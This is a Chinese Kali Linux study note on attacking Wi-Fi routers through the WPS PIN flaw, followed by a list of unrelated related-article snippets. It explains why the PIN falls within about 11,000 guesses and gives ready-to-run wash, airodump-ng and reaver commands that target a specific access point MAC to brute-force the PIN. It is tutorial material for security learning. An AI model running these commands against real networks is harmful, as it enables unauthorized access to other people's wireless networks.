Kali linux 学习笔记(三十五)无线渗透——WPS攻击 2020.3.13
前言
WPS(wireless protected setup)
- wifi联盟2006年开发的技术
- 路由器和网卡各按一个键就能接入无线
- PIN码分为前后两段各4位
1、安全漏洞
- 2011年发现接入发起方可以根据路由器的返回信息判断前四位是否正确
- 后四位穷举,最后一位是校验位,只要1000次尝试
- 总共11000次尝试可以破解PIN码,得到无线密码,一天内肯定可以搞出来
- 很多厂家的无线路由器无法关闭WPS功能
2、破解
wash -C -i wlan0mon -c 11#启动侦听,发现支持WPS的AP,-c指定信道11
airodump-ng wlan0mon --wps #抓包
reaver -i wlan0mon -b 14:75:90:21:4F:56 -vv -c 11#爆破PIN码,-b指定AP的MAC,-vv说明详细显示信息
reaver -i wlan0mon -b 14:75:90:21:4F:56 -vv -c 11 -K 1 #针对有漏洞的,妙破,可以先尝试
reaver -i wlan0mon -b 14:75:90:21:4F:56 -vv -c 11 -p 88888888 #-p指定PIN码结语
WPS安全性很低
破解很快偏偏好些路由器自带
Kali linux 学习笔记(三十五)无线渗透——WPS攻击 2020.3.13相关推荐
- Cty的Linux学习笔记(十五——wget)
Linux学习笔记--第十五篇 wget命令用于在终端中下载网络文件,格式为"wget [参数] 下载地址" 参数: -b:后台下载模式 -P:下载到指定目录 -t:最大尝试次 ...
- Kali linux 学习笔记(十九)缓冲区溢出——linux(crossfire) 2020.3.1
前言 上一篇在windows下用SLMail的漏洞实现缓冲区溢出 这次在Linux下用crossfire的漏洞实现缓冲区溢出 crossfire穿越火线 多人在线rpg游戏 1.9.0版本接受入站so ...
- Linux学习笔记(十五)用户和用户组
一.四个配置文件 解释: (1)当组内仅有一个用户且用户名和组名相同时,[组中用户列表]可省略不写 (2)root用户组的组号为0 (3)组号1-499位系统预留组号,是预留给安装在系统中的软件或服务 ...
- Kali linux 学习笔记(十六)主动信息收集——防火墙识别(scapy、lbd、waf) 2020.2.25
前言 通过检查回包,识别端口是否经过防火墙过滤 大概有四种情况 当然误差存在一定误差 1.scapy 根据上述四种情况,可以写个脚本 fw_detect.py #!/usr/bin/python im ...
- Kali Linux学习笔记—无线渗透 WPA攻击(PSK破解、AIROLIB、JTR、cowpatty、pyrit)
Kali linux 学习笔记 无线渗透--WPA攻击(PSK破解.AIROLIB.JTR.cowpatty.pyrit) PSK破解原理 PSK破解过程 实验步骤--使用字典rockyou.txt ...
- JavaScript学习笔记(十五)
JavaScript学习笔记(十五) 事件 事件是DOM(文档对象模型)的一部分.事件流就是事件发生顺序,这是IE和其他浏览器在事件支持上的主要差别. 一.事件流 1.冒泡型事件 IE上的解决方案就是 ...
- OpenCV学习笔记(十五):图像仿射变换:warpAffine(),getRotationMatrix2D()
OpenCV学习笔记(十五):图像仿射变换:warpAffine(),getRotationMatrix2D() 一个任意的仿射变换都能表示为乘以一个矩阵(线性变换)接着再加上一个向量(平移)的形式. ...
- Mr.J-- jQuery学习笔记(三十二)--jQuery属性操作源码封装
扫码看专栏 jQuery的优点 jquery是JavaScript库,能够极大地简化JavaScript编程,能够更方便的处理DOM操作和进行Ajax交互 1.轻量级 JQuery非常轻巧 2.强大的 ...
- cortex_m3_stm32嵌入式学习笔记(十五):待机唤醒实验(WK_UP外部中断)
cortex_m3_stm32嵌入式学习笔记(十五):待机唤醒实验(WK_UP外部中断) https://blog.csdn.net/qq_16255321/article/details/43086 ...
最新文章
- SpringBoot @Value、 @ConfigurationProperties 与 @EnableConfigurationProperties 使用
- 在JavaScript函数中使用EL表达式注意的事项
- vue-router 如何在当前路由下重新点击当前路由的router-link实现刷新
- pytorch学习笔记(三十四):MiniBatch-SGD
- zip、rar文件格式
- MongoDB CookBook读书笔记之备份与恢复
- 利用python调用谷歌翻译API
- 关闭WPS热点及广告推送
- 关于win10无法正常关机
- 《计算机网络》章节重要概念
- 红米Redmi K40手机刷入Magisk获取Root教程
- 0基础自学软件测试的渠道你知道哪些?
- css设置透明背景,背景色透明度
- 100000以内的质数表
- 洛谷 P4233 射命丸文的笔记 题解
- AndroidStudio下使用cmake开发ndk
- 超好用的局域网传输文字文件软件
- 2022-2028年中国小麦组织蛋白行业市场发展潜力及投资前景分析报告
- 树莓派如何与物联网平台交互(搭建一个树莓派网关)(一)
- 产品运营数据分析框架应该包含哪些重要指标?